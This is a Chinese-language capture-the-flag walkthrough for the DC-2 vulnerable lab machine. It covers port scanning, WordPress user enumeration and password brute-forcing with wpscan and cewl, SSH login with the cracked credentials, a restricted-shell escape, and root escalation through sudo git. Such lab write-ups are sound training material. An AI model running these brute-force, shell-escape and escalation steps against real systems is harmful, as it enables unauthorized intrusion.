DC-2通关讲解
打开dc-2虚拟机查看ip:192.168.×××.×××
确保攻击机与靶机在同一网络段通常设置为桥接模式或NAT模式。
使用nmap工具发现在同一桥段下的ip地址
nmap -sP 192.168.132.128/24
探测端口及服务:使用命令探测开放的端口
nmap -A -p- -v 192.168.132.130
探测开放俩个端口,80默认端口和7744端口。
访问web端口 (找不到服务器)
解析失败,我们需要更改hosts文件,添加一个ip域名指向。
修改hosts文件,添加靶机IP到域名dc-2的指向
添加完成后再次访问即可访问成功
在网站中点到flag发现是flag1
我们可以使用dirb命令进行目录扫描,看看网站下有什么东西
dirb http://dc-2
这其中有很多后台地址,但似乎没有什么有用的东西
打开进入网站登录页面
用户枚举再尝试利用枚举到的用户爆破密码
wpscan --url http://dc-2 --enumerate u 枚举拿到网址的用户
有三个用户 admin,Jerry,tom
WPScan是Kali Linux默认自带的一款漏洞扫描工具,它采用Ruby编写,能够扫描WordPress网站中的多种安全漏洞,其中包括主题漏洞、插件漏洞和WordPress本身的漏洞。最新版本WPScan的数据库中包含超过18000种插件漏洞和2600种主题漏洞,并且支持最新版本的WordPress。值得注意的是,它不仅能够扫描类似robots.txt这样的敏感文件,而且还能够检测当前已启用的插件和其他功能。
密码枚举爆破
爆破用户名和密码
这里可以使用-w参数来将密码字典存储为text文件:
cewl http://dc-2/ -w dc2.txt
使用wpscan进行暴力破解
wpscan --url http://dc-2 --passwords dc2.txt
拿到爆破账号和密码
Jerry;adipiscing
Tom;parturient
接着我们进入后台
用Jerry;adipiscing登录站点
用Tom;parturient登录站点
进入jerry账号登录拿到flag2
如果你不能利用WordPress并采取一条捷径,还有另外一种方法。
希望你找到了另一个入口。
不用word press想到了ssh端口服务
用tom账号登录
登录ssh;ssh tom@192.168.66.141 -p 7744
看到了flag3.txt
发现cat flag3.txt找不到命令
我这里把查看命令都尝试了一遍 less和vi可以来查看,
查看可以使用的命令
echo $PATH
cd进不去目录 使用ls直接查看目录信息
依次输入不要一次性输入
BASH_CMDS[a]=/bin/sh;a
export PATH=$PATH:/bin/
export PATH=$PATH:/usr/bin
echo /*
cd ../
cd ./jerry
在jreey目录发现flag4.txt
翻译:很高兴看到你走到这一步——但你还没有到家。
你还需要获取最后的标志(唯一真正重要的标志!!!)。
这里没有提示——你现在得靠自己了。 :-)
继续——从这里滚出去!!!!
使用tom用户无权限运行sudo 我们切换到jerry用户
我们可以看到无需root权限,jerry 可以使用 git
sudo -l
查看一下可以使用的root权限命令
find / -user root -perm -4000 -print 2>/dev/null
用户不可以直接sudo su
使用git命令进行提取
sudo git help status
输入!/bin/sh
提权成功
发现final-flag.txt
cd /root
cat final-flag.txt